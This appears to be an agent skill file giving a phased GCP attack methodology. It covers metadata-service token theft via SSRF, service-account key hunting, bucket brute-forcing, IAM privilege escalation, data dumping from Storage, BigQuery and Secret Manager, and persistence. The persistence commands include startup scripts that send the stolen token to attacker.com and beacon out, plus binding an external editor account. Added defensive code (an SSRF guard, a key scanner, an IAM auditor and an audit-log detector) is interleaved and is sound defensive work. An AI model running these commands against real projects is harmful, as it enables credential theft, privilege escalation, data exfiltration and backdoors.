| name | gcp-exploit |
| description | GCP cloud environment attack methodology. Use when the target runs on Google Cloud Platform or when GCP Service Accounts, the Metadata service, or Storage Buckets are discovered. Covers Metadata service exploitation, Service Account key theft, IAM privilege escalation, GKE escape, and Storage Bucket enumeration |
| metadata | {"tags":"gcp,google cloud,service account,metadata,iam,gke,bucket,云攻击,GCP提权","category":"cloud","mitre_attack":"T1078.004,T1552.005,T1530,T1611"} |
# GCP Cloud Environment Attack Methodology

Difference from AWS: GCP's IAM inheritance model combined with its Service Account key mechanism produces its own distinct attack paths.

⛔ Further reading
## Phase 1: Initial Access and Reconnaissance

### 1.1 Metadata service (SSRF → GCP credentials)

```bash
# Root of the metadata tree (the header is mandatory; the server rejects requests without it)
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/
# Access token of the service account attached to the instance
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
# Project ID
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/project/project-id"
# All instance attributes (custom metadata, startup scripts)
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true"
# Project-wide SSH keys
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys"
```
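The metadata endpoints above are only reachable from inside the VM, which is why a server-side request forgery in an application running there is the usual way they get reached from outside. The following is an added example, not code from the original page: a URL guard for a server-side fetch feature that refuses the metadata hostnames and any host that is, or resolves to, a link-local, private or loopback address (including IPv4-mapped IPv6 forms). The `resolver` parameter and the example hostnames are this example's own.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Names the GCP metadata server answers to: the two hostnames used above plus the
# fixed link-local IP behind them.
METADATA_HOSTS = {"metadata.google.internal", "metadata", "169.254.169.254"}


def _is_internal(addr: str) -> bool:
    """True for any address an outbound fetch from a cloud VM should never reach."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 is still the metadata server
    return (
        ip.is_link_local  # 169.254.0.0/16, where the metadata server lives
        or ip.is_private
        or ip.is_loopback
        or ip.is_reserved
        or ip.is_multicast
        or ip.is_unspecified
    )


def resolve_host(host: str) -> list:
    """Resolve a hostname to all of its addresses; separate so it can be stubbed in tests."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def check_outbound_url(url: str, resolver=resolve_host):
    """Decide whether a user-supplied URL may be fetched server-side.

    Returns (allowed, reason). Rejects non-HTTP schemes, the metadata hostnames,
    and every host that is or resolves to an internal address.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False, "missing host"
    if host in METADATA_HOSTS or host.endswith(".google.internal"):
        return False, f"{host!r} is the metadata server"
    try:
        addrs = [str(ipaddress.ip_address(host))]  # IP literal: no DNS lookup needed
    except ValueError:
        addrs = resolver(host)  # hostname: every address it resolves to must pass
        if not addrs:
            return False, f"{host!r} does not resolve"
    for addr in addrs:
        if _is_internal(addr):
            return False, f"{host!r} resolves to internal address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for u in ("http://metadata.google.internal/computeMetadata/v1/",
              "http://[::ffff:169.254.169.254]/", "https://example.test/api"):
        print(u, check_outbound_url(u))
```

Two caveats worth keeping in mind: the check and the later connection are two DNS lookups, so pin the address you validated when you open the connection (or re-validate at connect time) to close the rebinding gap; and the mandatory `Metadata-Flavor: Google` header stops only SSRF primitives that cannot set headers, so the network-level guard is still needed.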
### 1.2 Service Account key discovery

```bash
# Key files are JSON and always contain private_key_id and a *.iam.gserviceaccount.com client_email
grep -r "private_key_id" /path/to/code/
find / -name "*.json" -exec grep -l "client_email.*iam.gserviceaccount.com" {} \;
```
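The two greps above match on a single string, so they also fire on test fixtures and miss keys pasted into `.env` files as a one-line value. As an added example (not part of the original page, and not any project's tooling), here is a scanner that parses each candidate as JSON, checks the field set Google writes into every key file, and reports only a redacted fingerprint, which is what a pre-commit hook or repository sweep on the defending side needs. The sample key and `.env` text are constructed placeholders.

```python
import json
import re
from pathlib import Path
from typing import Optional

# Every downloaded service-account key file carries these fields.
REQUIRED_FIELDS = {"type", "project_id", "private_key_id", "private_key", "client_email"}
SA_EMAIL_RE = re.compile(r"^[a-z0-9-]+@[a-z0-9-]+\.iam\.gserviceaccount\.com$")
# Pulls a flat JSON object containing private_key_id out of surrounding text
# (.env files, YAML, source). Key files have no nested objects, so [^{}] suffices.
EMBEDDED_JSON_RE = re.compile(r'\{[^{}]*"private_key_id"[^{}]*\}')


def classify_key_material(text: str) -> Optional[dict]:
    """Return a redacted finding if `text` is, or embeds, a GCP service-account key.

    The private key itself never leaves this function; only enough of the key id
    is kept to match it against `gcloud iam service-accounts keys list`.
    """
    for candidate in [text, *EMBEDDED_JSON_RE.findall(text)]:
        try:
            obj = json.loads(candidate)
        except ValueError:
            continue
        if not isinstance(obj, dict) or obj.get("type") != "service_account":
            continue
        if REQUIRED_FIELDS - set(obj):
            continue
        if not SA_EMAIL_RE.match(obj["client_email"]):
            continue
        if "BEGIN PRIVATE KEY" not in obj["private_key"]:
            continue
        return {
            "project_id": obj["project_id"],
            "client_email": obj["client_email"],
            "key_id_prefix": obj["private_key_id"][:8],
        }
    return None


def scan_tree(root: Path, max_bytes: int = 1_000_000) -> list:
    """Walk a checkout and return (path, finding) pairs for every key file found."""
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.stat().st_size > max_bytes:
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        if "private_key_id" not in text:  # same cheap pre-filter the grep above relies on
            continue
        finding = classify_key_material(text)
        if finding:
            findings.append((str(path), finding))
    return findings


# Constructed sample: the shape of a real key file with placeholder values.
SAMPLE_KEY = json.dumps({
    "type": "service_account",
    "project_id": "example-project",
    "private_key_id": "0123456789abcdef0123456789abcdef01234567",
    "private_key": "-----BEGIN PRIVATE KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END PRIVATE KEY-----\n",
    "client_email": "ci-deployer@example-project.iam.gserviceaccount.com",
    "client_id": "000000000000000000000",
    "token_uri": "https://oauth2.googleapis.com/token",
})
# The same key pasted into a .env file, the way it often ends up committed.
SAMPLE_ENV = "DEBUG=1\nGOOGLE_CREDENTIALS='" + SAMPLE_KEY + "'\n"

if __name__ == "__main__":
    import sys
    for path, finding in scan_tree(Path(sys.argv[1] if len(sys.argv) > 1 else ".")):
        print(f"{path}: {finding}")
```

Run it as `python3 scan_keys.py /path/to/checkout`; a finding's `client_email` and `key_id_prefix` are enough to locate and revoke the key with `gcloud iam service-accounts keys delete` without the report itself becoming a copy of the secret.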
### 1.3 Bucket enumeration

```bash
# Probe likely bucket names by HTTP status (403 = exists but denied, 404 = no such bucket)
for prefix in target target-prod target-dev target-backup target-assets; do
  status=$(curl -s -o /dev/null -w "%{http_code}" "https://storage.googleapis.com/$prefix")
  echo "$prefix: $status"
done
# Or with GCPBucketBrute
python3 gcpbucketbrute.py -k target -o results.txt
```
## Phase 2: Authentication and Permission Confirmation

```bash
# Authenticate with a service-account key file
gcloud auth activate-service-account --key-file=stolen-key.json
# Or use a raw access token (e.g. one obtained from the metadata service)
gcloud config set auth/access_token_file /tmp/token.txt
# Confirm identity and project
gcloud auth list
gcloud config get-value project
# Roles bound to the current principal on the project
gcloud projects get-iam-policy $(gcloud config get-value project) \
  --flatten="bindings[].members" \
  --filter="bindings.members:$(gcloud config get-value account)"
# Search all reachable resources for owner bindings (requires the Cloud Asset API)
gcloud asset search-all-iam-policies --query="policy:roles/owner"
```
## Phase 3: IAM Privilege Escalation

### 3.1 Common escalation paths

```text
GCP IAM escalation paths:
├─ iam.serviceAccountKeys.create → create a new key for a higher-privileged SA
├─ iam.serviceAccounts.getAccessToken → obtain another SA's token directly
├─ iam.serviceAccounts.implicitDelegation → chained delegation
├─ iam.serviceAccounts.signBlob → sign a JWT to impersonate another SA
├─ iam.serviceAccounts.signJwt → sign a JWT directly
├─ deploymentmanager.deployments.create → deploy resources as the Deployment Manager SA
├─ cloudfunctions.functions.create → create a function that runs as a higher-privileged SA
├─ compute.instances.create → create a VM with a higher-privileged SA attached
├─ run.services.create → create a Cloud Run service with an SA attached
└─ orgpolicy.policy.set → modify organization policy
```
### 3.2 Examples

```bash
# iam.serviceAccountKeys.create: mint a new key for a higher-privileged SA
gcloud iam service-accounts keys create /tmp/key.json \
  --iam-account=high-priv-sa@project.iam.gserviceaccount.com
# iam.serviceAccounts.getAccessToken: impersonate another SA
gcloud auth print-access-token --impersonate-service-account=target-sa@project.iam.gserviceaccount.com
# cloudfunctions.functions.create (plus iam.serviceAccounts.actAs on the SA): run code as a higher-privileged SA
gcloud functions deploy privesc \
  --runtime python39 \
  --trigger-http \
  --service-account=high-priv-sa@project.iam.gserviceaccount.com \
  --source=./malicious-function/
# compute.instances.create (plus actAs): attach the SA to a new VM and read its token from the startup script
gcloud compute instances create privesc-vm \
  --service-account=high-priv-sa@project.iam.gserviceaccount.com \
  --scopes=cloud-platform \
  --metadata=startup-script='curl -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/service-accounts/default/token > /tmp/token; curl https://attacker.com/exfil -d @/tmp/token'
```
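Every path in 3.1 and every command in 3.2 starts from a role binding that carries one of the listed permissions, and the `add-iam-policy-binding` persistence step in Phase 5 leaves the same kind of trace. The following added example (not from the original page) audits the JSON that `gcloud projects get-iam-policy PROJECT --format=json` returns and flags bindings that grant those permissions, bind basic roles, or bind public or external principals. The role-to-permission table is a partial mapping and an assumption of this example; regenerate it from `gcloud iam roles describe ROLE` before relying on it. The sample policy and `trusted_domains` parameter are constructed.

```python
import json
from typing import Iterable

# Predefined roles that carry the permissions listed in 3.1. Partial mapping and an
# assumption of this example: regenerate it from `gcloud iam roles describe ROLE`
# (its includedPermissions field) rather than trusting it as-is.
ROLE_TO_PAGE_PERMISSIONS = {
    "roles/iam.serviceAccountKeyAdmin": ["iam.serviceAccountKeys.create"],
    "roles/iam.serviceAccountAdmin": ["iam.serviceAccountKeys.create"],
    "roles/iam.serviceAccountTokenCreator": [
        "iam.serviceAccounts.getAccessToken",
        "iam.serviceAccounts.implicitDelegation",
        "iam.serviceAccounts.signBlob",
        "iam.serviceAccounts.signJwt",
    ],
    "roles/deploymentmanager.editor": ["deploymentmanager.deployments.create"],
    "roles/cloudfunctions.developer": ["cloudfunctions.functions.create"],
    "roles/cloudfunctions.admin": ["cloudfunctions.functions.create"],
    "roles/compute.instanceAdmin.v1": ["compute.instances.create"],
    "roles/compute.admin": ["compute.instances.create"],
    "roles/run.developer": ["run.services.create"],
    "roles/run.admin": ["run.services.create"],
    "roles/orgpolicy.policyAdmin": ["orgpolicy.policy.set"],
}
BASIC_ROLES = {"roles/owner", "roles/editor"}  # supersets of the above; always reportable
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}


def member_domain(member: str) -> str:
    """'user:alice@example.com' -> 'example.com'."""
    principal = member.partition(":")[2]
    return principal.rpartition("@")[2].lower()


def audit_policy(policy: dict, trusted_domains: Iterable[str]) -> list:
    """Flag bindings in a getIamPolicy result that open an escalation or persistence path."""
    trusted = {d.lower() for d in trusted_domains}
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        perms = ROLE_TO_PAGE_PERMISSIONS.get(role, [])
        for member in binding.get("members", []):
            reasons = []
            if member in PUBLIC_MEMBERS:
                reasons.append("public principal")
            elif member.startswith("deleted:"):
                reasons.append("deleted principal still bound")
            elif member.startswith(("user:", "group:")) and member_domain(member) not in trusted:
                reasons.append("principal outside trusted domains")
            if role in BASIC_ROLES:
                reasons.append(f"basic role {role}")
            elif perms:
                reasons.append("grants " + ", ".join(perms))
            if reasons:
                findings.append({
                    "role": role,
                    "member": member,
                    "reasons": reasons,
                    # A conditional binding narrows exposure; surface it for the reviewer.
                    "condition": binding.get("condition"),
                })
    return findings


def audit_policy_json(text: str, trusted_domains: Iterable[str]) -> list:
    """Wrapper for raw `gcloud projects get-iam-policy PROJECT --format=json` output."""
    return audit_policy(json.loads(text), trusted_domains)


# Constructed sample policy mirroring the bindings this page's commands produce.
SAMPLE_POLICY = {
    "version": 1,
    "etag": "BwXexample=",
    "bindings": [
        {"role": "roles/viewer", "members": ["user:dev@example.com"]},
        {"role": "roles/editor", "members": ["user:attacker@gmail.com"]},
        {"role": "roles/iam.serviceAccountTokenCreator",
         "members": ["serviceAccount:ci@example-project.iam.gserviceaccount.com"]},
        {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
    ],
}

if __name__ == "__main__":
    for f in audit_policy(SAMPLE_POLICY, ["example.com"]):
        print(f"{f['role']:40} {f['member']:60} {'; '.join(f['reasons'])}")
```

A project-level `roles/iam.serviceAccountTokenCreator` binding deserves a closer look than a binding on one service account, because at project scope it allows minting tokens for every service account in the project; the same audit can be run on the organization and folder policies, since bindings inherit downwards.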
## Phase 4: Data Access

```bash
# Cloud Storage
gsutil ls gs://
gsutil ls -r gs://target-bucket/
gsutil cp gs://bucket/secret.txt ./
gsutil cp -r gs://bucket/ ./local-dump/
# BigQuery
bq ls
bq ls project:dataset
bq query "SELECT * FROM \`project.dataset.table\` LIMIT 100"
bq extract project:dataset.table gs://bucket/export.csv
# Secret Manager
gcloud secrets list
gcloud secrets versions access latest --secret=db-password
# Firestore
gcloud firestore export gs://bucket/firestore-dump
```
## Phase 5: Persistence

```bash
# Add a user-managed key to an existing SA
gcloud iam service-accounts keys create backdoor.json \
  --iam-account=existing-sa@project.iam.gserviceaccount.com
# Bind an external identity to the project
gcloud projects add-iam-policy-binding PROJECT \
  --member='user:attacker@gmail.com' --role='roles/editor'
# Plant a startup script on an existing instance
gcloud compute instances add-metadata INSTANCE \
  --metadata=startup-script='curl https://attacker.com/beacon'
```
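All three persistence actions above are write operations, so Cloud Audit Logs record them in the Admin Activity log, which cannot be disabled. The following is an added example (not from the original page) of detection logic run over newline-delimited LogEntry records such as a log sink writes to Cloud Storage: it matches the `protoPayload.methodName` values for key creation, `SetIamPolicy`, and instance metadata changes, and raises the finding to high when the change is a basic-role or external-principal binding, a new user-managed key, or a metadata key that executes on the next boot. The shape of the logged `request` body for `setMetadata` is an assumption noted in the code; the sample log lines, principals and addresses are constructed.

```python
import json
from typing import Iterable, Optional

# protoPayload.methodName values Cloud Audit Logs record for the persistence actions
# above, plus the project-wide sibling of instances.setMetadata.
WATCHED_METHODS = {
    "google.iam.admin.v1.CreateServiceAccountKey": "service-account key created",
    "SetIamPolicy": "IAM policy changed",
    "v1.compute.instances.setMetadata": "instance metadata changed",
    "v1.compute.projects.setCommonInstanceMetadata": "project-wide instance metadata changed",
}
BASIC_ROLES = {"roles/owner", "roles/editor"}
# Metadata keys that turn into code execution or login on the next boot or SSH.
SENSITIVE_METADATA_KEYS = {"startup-script", "startup-script-url", "ssh-keys"}


def evaluate_entry(entry: dict, trusted_domains: Iterable[str]) -> Optional[dict]:
    """Return a finding for one audit-log entry, or None if the method is not watched."""
    payload = entry.get("protoPayload", {})
    method = payload.get("methodName", "")
    label = WATCHED_METHODS.get(method)
    if label is None:
        return None
    finding = {
        "time": entry.get("timestamp"),
        "method": method,
        "what": label,
        "actor": payload.get("authenticationInfo", {}).get("principalEmail", "?"),
        "caller_ip": payload.get("requestMetadata", {}).get("callerIp"),
        "resource": payload.get("resourceName"),
        "high": False,
    }
    if method == "SetIamPolicy":
        # Resource Manager records the diff as serviceData.policyDelta.bindingDeltas.
        deltas = payload.get("serviceData", {}).get("policyDelta", {}).get("bindingDeltas", [])
        added = [(d.get("role"), d.get("member")) for d in deltas if d.get("action") == "ADD"]
        finding["added"] = added
        trusted = {d.lower() for d in trusted_domains}
        for role, member in added:
            external = (member.startswith(("user:", "group:"))
                        and member.rpartition("@")[2].lower() not in trusted)
            if role in BASIC_ROLES or external:
                finding["high"] = True
    elif method == "google.iam.admin.v1.CreateServiceAccountKey":
        # User-managed keys never expire on their own; every creation is worth a review.
        finding["high"] = True
    else:
        # Assumption: the logged request body mirrors the API's Metadata resource
        # (items[] of {key, value}); confirm against your own logs before relying on it.
        items = payload.get("request", {}).get("items", [])
        keys = [i.get("key") for i in items]
        finding["keys"] = keys
        finding["high"] = any(k in SENSITIVE_METADATA_KEYS for k in keys)
    return finding


def scan_log_lines(lines: Iterable[str], trusted_domains: Iterable[str]) -> list:
    """Run evaluate_entry over newline-delimited JSON LogEntry records."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except ValueError:
            continue  # not a JSON record; skip rather than stop the pipeline
        finding = evaluate_entry(entry, trusted_domains)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample records with placeholder project, principals and addresses.
SAMPLE_LOG_LINES = [
    json.dumps({"timestamp": "2024-01-01T00:00:01Z", "protoPayload": {
        "serviceName": "iam.googleapis.com",
        "methodName": "google.iam.admin.v1.CreateServiceAccountKey",
        "authenticationInfo": {"principalEmail": "admin@example.com"},
        "requestMetadata": {"callerIp": "203.0.113.7"},
        "resourceName": "projects/-/serviceAccounts/existing-sa@example-project.iam.gserviceaccount.com"}}),
    json.dumps({"timestamp": "2024-01-01T00:00:02Z", "protoPayload": {
        "serviceName": "cloudresourcemanager.googleapis.com",
        "methodName": "SetIamPolicy",
        "authenticationInfo": {"principalEmail": "admin@example.com"},
        "resourceName": "projects/example-project",
        "serviceData": {"policyDelta": {"bindingDeltas": [
            {"action": "ADD", "role": "roles/editor", "member": "user:attacker@gmail.com"}]}}}}),
    json.dumps({"timestamp": "2024-01-01T00:00:03Z", "protoPayload": {
        "serviceName": "compute.googleapis.com",
        "methodName": "v1.compute.instances.setMetadata",
        "authenticationInfo": {"principalEmail": "admin@example.com"},
        "resourceName": "projects/example-project/zones/us-central1-a/instances/web-1",
        "request": {"items": [{"key": "startup-script", "value": "<redacted>"}]}}}),
    json.dumps({"timestamp": "2024-01-01T00:00:04Z", "protoPayload": {
        "serviceName": "compute.googleapis.com",
        "methodName": "v1.compute.instances.get"}}),  # benign read; not watched
    "not a json record",
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES, ["example.com"]):
        print(f"{f['time']} {'HIGH' if f['high'] else 'info'} {f['what']} by {f['actor']} on {f['resource']}")
```

The same three method names are what an alerting rule in Cloud Logging would filter on; the point of the extra logic here is to rank a key creation or an `allUsers`/outside-domain binding above routine policy edits so that the review queue stays short.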
## Tool Cheat Sheet

| Tool | Purpose |
|---|---|
| gcloud CLI | Official GCP command-line tool |
| GCPBucketBrute | Bucket enumeration |
| ScoutSuite | Multi-cloud security audit |
| Prowler | GCP security checks |
| GCP IAM Privilege Escalation | Privilege-escalation check tool |
| Hayat | GCP attack framework |